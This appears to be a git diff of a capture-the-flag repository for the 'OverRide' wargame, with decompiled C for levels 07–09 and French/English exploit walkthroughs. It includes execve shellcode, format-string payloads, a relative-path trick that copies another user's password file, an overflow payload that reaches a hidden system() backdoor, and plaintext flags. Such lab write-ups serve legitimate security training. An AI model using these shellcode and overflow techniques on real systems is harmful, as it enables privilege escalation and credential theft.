z<6vB|9u(%NsCln2pU&8~Fn<(QJ2vOB!hEW$`Kqvb`g2|?{C+a|9-uIv{?Nz#QJ6cJ znokN}A+i1`$Ijp#H^2D3!yfa?DRq3famBqu`{%%XE6ACxp)(t_jfo`7sCD=IGl0YTUa(vTnDVat$J+?}EA)T0E8kX9-vUm0`uhOzHSnJ+hxYaW>-9+dDPXQYWq-ct1K#Cn z@AJUk_&ov4J6QaF$NFCe{~_$Rx%Q6&>trBv(u3K*p9AatVjy17L*v%bA)Q>&>Fo6-5HR^(f#Yz4OuqtaKt%9`O!CcM|QQc+>H zd~|curVY)o?vcoAk;1&aZOgi*Hgn7R_1juI%#NmYZLRE}yu296=1lo2jEbvPuL|Lc zquCQN?RYM=JJi`L_*$!OIJ!3?8yoc{#|HOSrMD!Kw89y6@lxNG^or$eN^gN_$@gaM z!t|S%Q;I9}c&OOOZ|bJHEdhzwN8IR~s@4GEwELmZ&8E#bzRV}B(kr4D-R7KbXEIvy zj|h23)T_X_<=~NfRn#kz1H@|$rk&`v> 0x18 == 0xb7)) { + puts(" *** ERROR! ***"); + puts(" This index is reserved for wil!"); + puts(" *** ERROR! ***"); + uVar3 = 1; + } + else { + *(uint *)(uVar2 * 4 + param_1) = uVar1; + uVar3 = 0; + } + return uVar3; +} + +undefined4 read_number(int param_1) +{ + int iVar1; + + printf(" Index: "); + iVar1 = get_unum(); + printf(" Number at data[%u] is %u\n",iVar1,*(undefined4 *)(iVar1 * 4 + param_1)); + return 0; +} + +undefined4 main(undefined4 param_1,char **param_2,char **param_3) +{ + char cVar1; + int iVar2; + uint uVar3; + undefined4 *puVar4; + char *pcVar5; + byte *pbVar6; + int in_GS_OFFSET; + bool bVar7; + bool bVar8; + bool bVar9; + byte bVar10; + char **local_1c8; + char **local_1c4; + undefined4 local_1bc [100]; + undefined4 local_2c; + undefined4 local_28; + undefined4 local_24; + undefined4 local_20; + undefined4 local_1c; + undefined4 local_18; + int local_14; + + bVar10 = 0; + local_1c4 = param_2; + local_1c8 = param_3; + local_14 = *(int *)(in_GS_OFFSET + 0x14); + local_2c = 0; + local_28 = 0; + local_24 = 0; + local_20 = 0; + local_1c = 0; + local_18 = 0; + puVar4 = local_1bc; + for (iVar2 = 100; iVar2 != 0; iVar2 = iVar2 + -1) { + *puVar4 = 0; + puVar4 = puVar4 + 1; + } + for (; *local_1c4 != (char *)0x0; local_1c4 = local_1c4 + 1) { + uVar3 = 0xffffffff; + pcVar5 = *local_1c4; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *pcVar5; + pcVar5 = pcVar5 + (uint)bVar10 * -2 + 1; + } while (cVar1 != '\0'); + memset(*local_1c4,0,~uVar3 - 1); + } + for (; *local_1c8 != (char *)0x0; local_1c8 = local_1c8 + 1) { + uVar3 = 0xffffffff; + pcVar5 = *local_1c8; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *pcVar5; + pcVar5 = pcVar5 + (uint)bVar10 * -2 + 1; + } while (cVar1 != '\0'); + memset(*local_1c8,0,~uVar3 - 1); + } + puts( + "----------------------------------------------------\n Welcome to wil\'s crappy number stora ge service! \n----------------------------------------------------\n Commands: \n store - store a number into the data storage \n read - read a number from the data storage \n quit - exit the program \n----------------------------------------------------\n wil has reserved some storage :> \n----------------------------------------------------\n" + ); + do { + printf("Input command: "); + local_2c = 1; + fgets((char *)&local_28,0x14,stdin); + uVar3 = 0xffffffff; + puVar4 = &local_28; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *(char *)puVar4; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + } while (cVar1 != '\0'); + uVar3 = ~uVar3; + bVar7 = uVar3 == 1; + bVar9 = uVar3 == 2; + *(undefined *)((int)&local_2c + uVar3 + 2) = 0; + iVar2 = 5; + puVar4 = &local_28; + pbVar6 = (byte *)"store"; + do { + if (iVar2 == 0) break; + iVar2 = iVar2 + -1; + bVar7 = *(byte *)puVar4 < *pbVar6; + bVar9 = *(byte *)puVar4 == *pbVar6; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + pbVar6 = pbVar6 + (uint)bVar10 * -2 + 1; + } while (bVar9); + bVar8 = false; + bVar7 = (!bVar7 && !bVar9) == bVar7; + if (bVar7) { + local_2c = store_number(local_1bc); + } + else { + iVar2 = 4; + puVar4 = &local_28; + pbVar6 = &DAT_08048d61; + do { + if (iVar2 == 0) break; + iVar2 = iVar2 + -1; + bVar8 = *(byte *)puVar4 < *pbVar6; + bVar7 = *(byte *)puVar4 == *pbVar6; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + pbVar6 = pbVar6 + (uint)bVar10 * -2 + 1; + } while (bVar7); + bVar9 = false; + bVar7 = (!bVar8 && !bVar7) == bVar8; + if (bVar7) { + local_2c = read_number(local_1bc); + } + else { + iVar2 = 4; + puVar4 = &local_28; + pbVar6 = &DAT_08048d66; + do { + if (iVar2 == 0) break; + iVar2 = iVar2 + -1; + bVar9 = *(byte *)puVar4 < *pbVar6; + bVar7 = *(byte *)puVar4 == *pbVar6; + puVar4 = (undefined4 *)((int)puVar4 + (uint)bVar10 * -2 + 1); + pbVar6 = pbVar6 + (uint)bVar10 * -2 + 1; + } while (bVar7); + if ((!bVar9 && !bVar7) == bVar9) { + if (local_14 == *(int *)(in_GS_OFFSET + 0x14)) { + return 0; + } + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + } + } + if (local_2c == 0) { + printf(" Completed %s command successfully\n",&local_28); + } + else { + printf(" Failed to do %s command\n",&local_28); + } + local_28 = 0; + local_24 = 0; + local_20 = 0; + local_1c = 0; + local_18 = 0; + } while( true ); +} diff --git a/level07/walkthrough b/level07/walkthrough index d2481d0..8db872e 100644 --- a/level07/walkthrough +++ b/level07/walkthrough @@ -1,3 +1,9 @@ +On peut voir dans le code grace a ghidra qu'on ecrit a l'addresse "index * 4 + array", la maniere dont l'asm le fait c'est index << 2 + array. On peut donc bypass la protection tout les 3 en ajoutant 2^31 qui n'est pas un multiple de 3 ((3k+n)%3 != 0 si n%3 != 0). A partir de ca on peut ecrire un shellcode dans la memoire, ensuite j'overide la got via l'ancienne methode. + + +Ici bas la methode que j'essayais de faire pendant des jours alors que ca marche pas mais ca aurait ete la classe.............. +--------------------------------------------------------------------------------- + -1040108880On peut ecrire que 8 octets sur 12 "/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo diff --git a/level08/Ressources/level08 b/level08/Ressources/level08 deleted file mode 100755 index 49adcdb1c5506d015dc58fcea06feecc3ed1701e..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12975 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 diff --git a/level08/source b/level08/source new file mode 100644 index 0000000..44cf380 --- /dev/null +++ b/level08/source @@ -0,0 +1,113 @@ +void log_wrapper(FILE *param_1,char *param_2,char *param_3) +{ + char cVar1; + size_t sVar2; + ulong uVar3; + ulong uVar4; + char *pcVar5; + long in_FS_OFFSET; + byte bVar6; + undefined8 local_120; + char local_118 [264]; + long local_10; + + bVar6 = 0; + local_10 = *(long *)(in_FS_OFFSET + 0x28); + local_120 = param_1; + strcpy(local_118,param_2); + uVar3 = 0xffffffffffffffff; + pcVar5 = local_118; + do { + if (uVar3 == 0) break; + uVar3 = uVar3 - 1; + cVar1 = *pcVar5; + pcVar5 = pcVar5 + (ulong)bVar6 * -2 + 1; + } while (cVar1 != '\0'); + uVar4 = 0xffffffffffffffff; + pcVar5 = local_118; + do { + if (uVar4 == 0) break; + uVar4 = uVar4 - 1; + cVar1 = *pcVar5; + pcVar5 = pcVar5 + (ulong)bVar6 * -2 + 1; + } while (cVar1 != '\0'); + snprintf(local_118 + (~uVar4 - 1),0xfe - (~uVar3 - 1),param_3); + sVar2 = strcspn(local_118,"\n"); + local_118[sVar2] = '\0'; + fprintf(local_120,"LOG: %s\n",local_118); + if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + return; +} + +undefined8 main(int param_1,undefined8 *param_2) +{ + char cVar1; + int __fd; + int iVar2; + FILE *pFVar3; + FILE *__stream; + ulong uVar4; + undefined8 *puVar5; + long in_FS_OFFSET; + byte bVar6; + char local_79; + undefined8 local_78; + undefined2 local_70; + char local_6e; + long local_10; + + bVar6 = 0; + local_10 = *(long *)(in_FS_OFFSET + 0x28); + local_79 = -1; + if (param_1 != 2) { + printf("Usage: %s filename\n",*param_2); + } + pFVar3 = fopen("./backups/.log","w"); + if (pFVar3 == (FILE *)0x0) { + printf("ERROR: Failed to open %s\n","./backups/.log"); + /* WARNING: Subroutine does not return */ + exit(1); + } + log_wrapper(pFVar3,"Starting back up: ",param_2[1]); + __stream = fopen((char *)param_2[1],"r"); + if (__stream == (FILE *)0x0) { + printf("ERROR: Failed to open %s\n",param_2[1]); + /* WARNING: Subroutine does not return */ + exit(1); + } + local_78 = 0x70756b6361622f2e; + local_70 = 0x2f73; + local_6e = '\0'; + uVar4 = 0xffffffffffffffff; + puVar5 = &local_78; + do { + if (uVar4 == 0) break; + uVar4 = uVar4 - 1; + cVar1 = *(char *)puVar5; + puVar5 = (undefined8 *)((long)puVar5 + (ulong)bVar6 * -2 + 1); + } while (cVar1 != '\0'); + strncat((char *)&local_78,(char *)param_2[1],99 - (~uVar4 - 1)); + __fd = open((char *)&local_78,0xc1,0x1b0); + if (__fd < 0) { + printf("ERROR: Failed to open %s%s\n","./backups/",param_2[1]); + /* WARNING: Subroutine does not return */ + exit(1); + } + while( true ) { + iVar2 = fgetc(__stream); + local_79 = (char)iVar2; + if (local_79 == -1) break; + write(__fd,&local_79,1); + } + log_wrapper(pFVar3,"Finished back up ",param_2[1]); + fclose(__stream); + close(__fd); + if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + return 0; +} diff --git a/level08/walkthrough b/level08/walkthrough index 06b88df..87b70ad 100644 --- a/level08/walkthrough +++ b/level08/walkthrough @@ -1,44 +1,7 @@ -load shellcode in env with nop slide +On a un binaire qui prend le contenu d'un fichier et le copie colle dans un dossier backup. Si on essaye de le lancer sur le pass du level09 ca ne fonctionne pas a cause d'une histoire de path. On va donc utiliser le fait que le path est relatif et recreer un dossier backup dans /tmp avec backups/home/users/level09/ -level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin -level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin) -level08@OverRide:~$ - - -(gdb) p (char *)getenv("SHELLCODE") -$1 = 0xffffffffffffe892
- -need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest. - -Better version (file doesn't need to exist as log_wrapper is called before fopen) - -level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)") -ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x -level08@OverRide:~$ cat backups/.log -LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 -level08@OverRide:~$ - -with env -i : -Breakpoint 1, 0x0000000000400a5a in main () -(gdb) p (char *)getenv("SHELLCODE") -$1 = 0xffffffffffffef79
- - - -env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')") - - -actually its way simpler T_T : - -level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/ -level08@OverRide:~$ cd /tmp -level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass -ERROR: Failed to open /home/users/level09/pass -level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass -level08@OverRide:/tmp$ cat backups/ -home/ .log -level08@OverRide:/tmp$ cat backups/home/users/level09/.pass -fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S -level08@OverRide:/tmp$ exit -logout -Connection to localhost closed. +level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/ +level08@OverRide:~$ cd /tmp +level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass +level08@OverRide:/tmp$ cat backups/home/users/level09/.pass +fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S diff --git a/level09/Ressources/level09 b/level09/Ressources/level09 deleted file mode 100755 index 57c0d8fd40ca4b277da3b0383c6cfa6b6271a683..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12959 zcmeHNYiu0V6~1f7iAns}JOGpDB;B+I)tiSCV;&B6Y$s#1d5}1eiiBakySA6?!|cwc zP87hclPIf=!L5KssYFwOL`0-2swx!Gf(!vdTR}rhX#|lP9+4apL@0q82)N(5bI)dG zVwY0&SLJK%o_oIYxaXd^_s)9eJkT6iQQ+|iZiQl*Ag+Ich14rS*Id;BsTZ~43VhEN zGsJlCMG~{*^%jBDYD3C3(_)1ef{w$dw!i}1bf(f{$`KN!@kVPUWtN1g5Sj$Yj$$2} zC0S5Sc9^bJanw^_vT5?0V6xL@OBPg<9j5&%Fs3{|nj3vum0ve)l3s*hO1jk6o;JhO z-&Z2p%V@xY1yi=W4R#dgf7&?Cb!xoP@=~ngXR4+v7Q~`$HA@!6!d0l=?t z8Kr=)+n%*^i^RB|O2X(8PsV3?^Iy;X_Pw9(cAqaP@M?m>@!iK9$C}pQ?xVnUvjT)D38~JOB zez6VDAFaT>Hr#%mSJ-g-d8XNLb!(F2R@!i$GYJ;jaC@A3@44c^qfi)Z^WZCvTb++@`VA-2TKSwN_~{++=-Hww$Qy>I zy$IEL=t7=4{c=$mx}G~5Hf=uIUOs0hrbPO6hv8CeKmg`+sE1UvWt;WBxDid?L?9dXoznZNrcRY>x`YVu!9dpZoeyMp_=fcCCLeaox!S}O5ckFeTL>b*y?70zZp&~ux7*m^OaH;@baDgx+f zft=~94CHqB7Ge$89xb2KL%I3H5uLTh*Q<@&Jw?O*7#cRO!T#FJv3gwH0#u!MkyGVkt!#?tXgI08%ZFg{(7r$F=ag1A&5`A&RZfc)nU z`J;LH6Ts^*r?(yQH}morfe%4WzViO>u*UZRdY^FQLjE?pZEw-;@kUvF?}Ud69xUt| zSFo{+;-oy3VBVe3!%;NW#xgLLfw2sXWne4=V;LCBz*q*xGBB2bu?&o5U@QY;8TdcW z03OiE##40jjH|~d@;M1%B}#B!J)AF9{6Y1Q{nM|9lLYNk4;T2^{+@A`B0tkVq2&B- z;Th$JpVe0={z^re@H>P-^&WzsVH{Kn{G5m15nQcsT@B3m9u*ip6QMRBzXjfFTaCxZ zBP2N=`NSR~1}Z{ z*am8*EZWIEyuyp5x`aQGG$a0okOtlg+IJ40e==X zQy)AIphK6C?cH?=8Y?R5UdM}o+wD!|h^g-z?3*C}410vf=W~MT&B~t74c?#Z zmfo+^8Nv1^REOzdHDTKBBw~Bs&$k1kGlcE=Tw==S5L9Gy=kG3{bOx|J?|Y^^e~zE^ zm~MeRohi)oxx!SFqgpj5G&aYtV6hz?x+ZMT=NQugrO4y6JHR&$#pgKR2bl6W%8lb)Ghy^>+HUVv=LypuQnEF#>N9;9yxpGbl$cgfa%_$57}}4H z-Jb7TOzC}}y}8_p0}zru=l_VhVKM!?-57n&AH$SiyS=;4hu(SEn|u7HA+*~Msv9y> z9|>*EJ^lb>q{8=6u7BeCA9udo_QzcI#i|~vcs2xR-(>$9bnN3-DEkU!?;g+1{{{B6 z_BejNuW@}Az0;w_>yzy{u9J}2$LG3>!*iq=D%+fm?U}ygvgh9+gUWub(>#Cu+5Q8U zeXXWRi&~3(WB$%Vn|$&7?^gD@vOfWty=is^{ZH|s`7dO7bQ){hV8jn5VOeKykgLkleXCtc3n<6BxIe~(lb zMw*3)nD3Kz%R)%_zURcp<$wP=@gl+ZDJMQ&@cqY$PY`@xapJ{R1&JL*zYxD(`95G5 z6^e<1&vz$2N$|Pt#7hL9$4ouMD zRKe$u6Q3sdTyf%8=Ib||_*MD(D<^)n;Qj5yD+KRbCw`6K{piG}+gaJS_Ccxmom%g# zK>KSP>hhRpO26wosHo%fnsM5%9&vdd=p6IlZLd2I&AJrv8trjec*8JyWk?j&Ir9HyeEiIoID5TB ztAT6c^7XT96#calFBOaF;6szO1E5sbKx@U_wg4Zg9y2BVT)t1cCGPej#NJWx0}?M4 z1M0fVS_haP0zO$>BYHGVIy<6V((m!f1yhCBb={wpew31poE!!J2)K8Iyj=vY+3dMH z2^V5=L51M|PZ_TuTwFSr`1jTKfR9w)dOdK;XYE{#T}XPf(&yiuENoQz?z-AFN}vBf zr~OQg?kk$?Ilri)kmA{^^1MWeyMfPhs!Hx*sek!-zF+xyRjnUcTS6A0U@T@UxfP+5 znKm=+?fwv|T^n21tTO^F>szT3*JyHZw>H{D;iS-KHO`ZdldQhyiR8Sy?QMm4P+O8v@3f6)V;^w;HVt%LC0cM_C!1 zulH5;#r5^}LSOoCUKI&b-LX@cj+jO~-C-3YJ4IY%ET1k|mB~&8t903kbp{jRSj2J} z+)A~}@+xpfT!qX|TUi6`gbc$Ly}Q)f2&a>VHJ~tB)?kh(s5Ve1<|u@g4@#{3s#Myl mrmbq~5o)&6kx&Y$X$yw7gp=3y_%b_FSipiJg#)cys4T1EK) diff --git a/level09/source b/level09/source new file mode 100644 index 0000000..d7c3a20 --- /dev/null +++ b/level09/source @@ -0,0 +1,82 @@ +void secret_backdoor(void) +{ + char local_88 [128]; + + fgets(local_88,0x80,stdin); + system(local_88); + return; +} + + +void set_username(long param_1) +{ + long lVar1; + undefined8 *puVar2; + undefined8 local_98 [17]; + int local_c; + + puVar2 = local_98; + for (lVar1 = 0x10; lVar1 != 0; lVar1 = lVar1 + -1) { + *puVar2 = 0; + puVar2 = puVar2 + 1; + } + puts(">: Enter your username"); + printf(">>: "); + fgets((char *)local_98,0x80,stdin); + for (local_c = 0; (local_c < 0x29 && (*(char *)((long)local_98 + (long)local_c) != '\0')); + local_c = local_c + 1) { + *(undefined *)(param_1 + 0x8c + (long)local_c) = *(undefined *)((long)local_98 + (long)local_c); + } + printf(">: Welcome, %s",param_1 + 0x8c); + return; +} + +void set_msg(char *param_1) +{ + long lVar1; + undefined8 *puVar2; + undefined8 local_408 [128]; + + puVar2 = local_408; + for (lVar1 = 0x80; lVar1 != 0; lVar1 = lVar1 + -1) { + *puVar2 = 0; + puVar2 = puVar2 + 1; + } + puts(">: Msg @Unix-Dude"); + printf(">>: "); + fgets((char *)local_408,0x400,stdin); + strncpy(param_1,(char *)local_408,(long)*(int *)(param_1 + 0xb4)); + return; +} + +void handle_msg(void) +{ + undefined local_c8 [140]; + undefined8 local_3c; + undefined8 local_34; + undefined8 local_2c; + undefined8 local_24; + undefined8 local_1c; + undefined4 local_14; + + local_3c = 0; + local_34 = 0; + local_2c = 0; + local_24 = 0; + local_1c = 0; + local_14 = 0x8c; + set_username(local_c8); + set_msg(local_c8); + puts(">: Msg sent!"); + return; +} + + +undefined8 main(void) +{ + puts( + "--------------------------------------------\n| ~Welcome to l33t-m$n ~ v1337 |\n- -------------------------------------------" + ); + handle_msg(); + return 0; +} diff --git a/level09/walkthrough b/level09/walkthrough index 7431a9f..39c0e23 100644 --- a/level09/walkthrough +++ b/level09/walkthrough @@ -2,6 +2,9 @@ python -c "print('a'*40+'\xff'+' '*208+'/bin/cat /home/users/end/.pass ;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')" | env -i /home/users/level09/level09 +Avec ghidra on trouve une fonction cache secret backdoor, on va essayer de l'appeler. + +We notice an small breach on the snprintf, the size arguement is writable with the 41th character of the username, we put 0xFF because it is the largest, then we can to a ret to the secret backdoor function which calls system, with spaces and a cat of the last flag it works ! This should win :